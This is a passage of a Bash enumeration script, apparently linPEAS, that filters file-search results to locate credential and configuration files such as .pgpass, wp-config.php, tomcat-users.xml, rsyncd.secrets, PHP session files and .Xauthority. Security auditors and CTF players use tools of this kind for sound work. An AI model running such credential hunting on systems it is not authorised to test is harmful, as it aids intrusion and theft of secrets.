"^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}sys|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}system|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}run|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}bin" | grep -E ".*\.service$" | sort | uniq | head -n 70) 798 PSTORAGE_TIMER=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}sys|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}system|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}run|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}bin" | grep -E ".*\.timer$" | sort | uniq | head -n 70) 799 PSTORAGE_SOCKET=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}sys|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}system|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}run|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}bin" | grep -E ".*\.socket$" | sort | uniq | head -n 70) 800 PSTORAGE_DBUS=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc|^${ROOT_FOLDER}usr" | grep -E "system\.d$|system-local\.d$|session\.d$|system-services$|services$" | sort | uniq | head -n 70) 801 PSTORAGE_MYSQL=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "mysql$|passwd\.ibd$|password.*\.ibd$|pwd\.ibd$|mysqld\.cnf$|\.mylogin\.cnf$" | sort | uniq | head -n 70) 802 PSTORAGE_MARIADB=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) 803 PSTORAGE_POSTGRESQL=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$|\.pgpass$|pgadmin4\.db$" | sort | uniq | head -n 70) 804 PSTORAGE_APACHE_NGINX=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$|nginx\.conf$|nginx$" | sort | uniq | head -n 70) 805 PSTORAGE_VARNISH=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "varnish$" | sort | uniq | head -n 70) 806 PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^${ROOT_FOLDER}var|^${ROOT_FOLDER}private|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}mnt" | grep -E "sess_.*$" | sort | uniq | head -n 70) 807 PSTORAGE_PHP_FILES=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) 808 PSTORAGE_APACHE_AIRFLOW=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "airflow\.cfg$|webserver_config\.py$" | sort | uniq | head -n 70) 809 PSTORAGE_X11=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.Xauthority$" | sort | uniq | head -n 70) 810 PSTORAGE_WORDPRESS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) 811 PSTORAGE_DRUPAL=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '/default/settings.php' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "settings\.php$" | sort | uniq | head -n 70) 812 PSTORAGE_MOODLE=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E 'moodle/config.php' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "config\.php$" | sort | uniq | head -n 70) 813 PSTORAGE_TOMCAT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) 814 PSTORAGE_MONGO=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) 815 PSTORAGE_ROCKETCHAT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "rocketchat\.service$" | sort | uniq | head -n 70) 816 PSTORAGE_SUPERVISORD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) 817 PSTORAGE_CESI=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) 818 PSTORAGE_RSYNC=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) 819 PSTORAGE_RPCD=$(echo -e 